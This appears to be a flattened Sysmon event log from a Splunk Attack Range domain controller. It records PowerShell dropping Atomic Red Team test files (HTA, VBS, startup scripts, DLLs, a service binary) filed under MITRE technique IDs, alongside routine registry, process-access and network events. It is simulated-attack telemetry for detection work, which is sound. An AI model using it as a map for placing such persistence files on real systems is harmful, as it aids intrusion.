21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d76873-0xf61439ce) 13241300x800000000000000024461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7687c-0x57d8a1ce) 11241100x800000000000000024460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.431{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.011\src\index.hta2021-06-23 21:08:49.431 11241100x800000000000000024459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:49.399{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.011\src\akteullen.vbs2021-06-23 21:08:49.399 23542300x800000000000000024458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.321{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDAC03DFB9BBF15525CE4124EDB48010,SHA256=2DD60AB5724F530087DA5E509F81152147AA4E0E335D0D766DC56A65CA425B46,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.228{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.010\bin\AllTheThingsx86.dll2021-06-23 21:08:49.228 11241100x800000000000000024456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.212{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.010\bin\AllTheThingsx64.dll2021-06-23 21:08:49.212 11241100x800000000000000024455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.071{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.008\src\Win32\T1218-2.dll2021-06-23 21:08:49.071 23542300x800000000000000024477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:50.935{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7CC575EA1BBE4C31E88F56FDD0E3D8CE,SHA256=7539B05E34246B3918B6FA2B43E3C6C37F3EC785B84BCEEE6CC7256179B653C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:50.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0C189745428ECEE74D801FCDA01178A,SHA256=9C1F702B54149B0B85A62B62054CAE22A93F5D87FB125E330E2A9F09105851F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:51.935{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=186D338B1F85A1AD89AC24931E27D840,SHA256=D96AFEF09F645C16EF5DD807C05A6B1748C17EE4A9D4C85A459EA6DD1F31285C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:51.888{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.011\bin\AtomicTest.exe2021-06-23 21:08:51.888 11241100x800000000000000024482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:51.873{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.011\bin\AtomicTest.dll2021-06-23 21:08:51.873 
11241100x800000000000000024481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:51.716{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.010\bin\T1546.010x86.dll2021-06-23 21:08:51.716 11241100x800000000000000024480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:51.701{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.010\bin\T1546.010.dll2021-06-23 21:08:51.701 23542300x800000000000000024479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:51.357{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E334D771F90373D79F941A5A984500E7,SHA256=F0C0521C937D141EC6794ECAF5B5A028E09D9CC75F69F6D4BF4D25C9F548D746,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:51.076{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1543.003\bin\AtomicService.exe2021-06-23 21:08:51.076 10341000x800000000000000024505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:52.951{4DB9351A-9DDD-60D3-1400-00000000CF01}10562052C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.939{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3ED7F2D34944CFB4CB11B7D0F421BA51,SHA256=78EA8B58ED7D9BA999C7A2A25D46B6EE92828DAF41604D69E5F11DD800556079,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.763{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1548.002\src\T1548.002.bat2021-06-23 21:08:52.763 23542300x800000000000000024494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.373{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4EE7DC1CD4494B25BA87BA15E2FFA47,SHA256=98462909BD307EBF3FDFE450FA3317DAE815EFEA22FE55CDBFE6D4AC03FEF39C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000024493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 
21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000024492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000024491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000024490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d76873-0xf805078a) 13241300x800000000000000024489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000024488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 11241100x800000000000000024487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.232{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1547.001\src\vbsstartup.vbs2021-06-23 21:08:52.232 
11241100x800000000000000024486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.216{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1547.001\src\jsestartup.jse2021-06-23 21:08:52.216 11241100x800000000000000024485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.201{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1547.001\src\batstartup.bat2021-06-23 21:08:52.201 11241100x800000000000000024522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.982{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1559.002\src\PowerShell_Script_For_DDE_Document.ps12021-06-23 21:08:53.982 10341000x800000000000000024521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.810{4DB9351A-A2E5-60D3-1F06-00000000CF01}71602932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000024520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:52.615{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61509-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000024519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.615{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61509-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000024518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.271{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61508-false10.0.1.12-8000- 11241100x800000000000000024517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.576{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1555\src\T1555-macrocode.txt2021-06-23 21:08:53.576 23542300x800000000000000024516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.576{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADF16F95C2B029BACD32657D15B8049,SHA256=D982164B7C7DA916BD0580DE67D758B3F511B670044B578EDE50EF52E98F13D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.576{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=655FA373C3B9A443BC2DA98D44775874,SHA256=8F159AF1E49936BA6341692CABE08B36C365435499D56574739A3A3CAD60C297,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 